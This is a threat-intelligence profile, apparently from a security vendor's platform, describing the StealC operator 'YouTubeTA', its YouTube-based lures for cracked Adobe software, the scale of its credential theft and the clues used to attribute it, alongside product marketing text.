YouTubeTA
YouTubeTA (short for "YouTube Threat Actor") is a StealC malware-as-a-service customer/operator identified by CyberArk through exploitation of an XSS vulnerability in the StealC web control panel. The actor used StealC throughout 2025 and relied extensively on YouTube to distribute the infostealer, advertising cracked versions of Adobe Photoshop and Adobe After Effects. Reporting indicates the actor likely hijacked older legitimate YouTube channels using compromised credentials and planted malicious links, creating a self-perpetuating distribution mechanism. Observed StealC build IDs associated with this operator included "YouTube," "YouTube2," and "YouTubeNew." Panel data indicated the operation maintained more than 5,000 victim logs containing roughly 390,000 stolen passwords and more than 30 million stolen cookies. The actor’s panel configuration included markers for studio.youtube.com credentials, consistent with targeting YouTube creator accounts. Victim screenshots also showed use of ClickFix-like social engineering. CyberArk assessed YouTubeTA was likely a single operator because the panel showed only one admin user and session fingerprinting was consistent across observations. Fingerprinting indicated use of an Apple Pro/M3-based device, English and Russian language support, and a GMT+0300 time zone. In mid-July 2025, the operator reportedly accessed the panel without a VPN, exposing an IP associated with the Ukrainian ISP TRK Cable TV. The content supports describing YouTubeTA as an Eastern European, likely Ukrainian-linked cybercriminal operator, but does not establish nation-state affiliation.
Know when an actor pivots toward your sector
Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.
Tradecraft
10 distinct techniques observed across reporting, grouped by tactic. Hover any cell for the evidence excerpt; click through for MITRE's full description.
Associated malware families
1 malware family attributed to this actor across reporting.
Recent activity
7 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A StealC customer/affiliate that distributes the stealer via YouTube-based lures advertising cracked software such as Adobe Photoshop and Adobe After Effects.
A StealC MaaS customer that distributes StealC via YouTube by promoting cracked software (e.g., Adobe Photoshop/After Effects), likely hijacking legitimate YouTube accounts to create a self-propagating distribution loop; also uses fake CAPTCHA lures to deliver the stealer.
A StealC operator involved in credential theft and cookie theft, apparently using compromised YouTube channels and stolen studio.youtube.com credentials to distribute StealC and expand malware distribution.
A StealC MaaS customer/operator running malware distribution campaigns via hijacked YouTube channels, using compromised credentials and malicious links to infect victims and steal credentials/cookies at scale.
The version that knows your environment.
Match sector + geo + tech-stack targeting against your real footprint.
Every observed MITRE ATT&CK technique, grouped by tactic.
Families this actor is known to deploy, with IOCs and behavior.
CVEs this actor has used in known campaigns.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Domains, IPs, and hashes tied to this actor, refreshed continuously.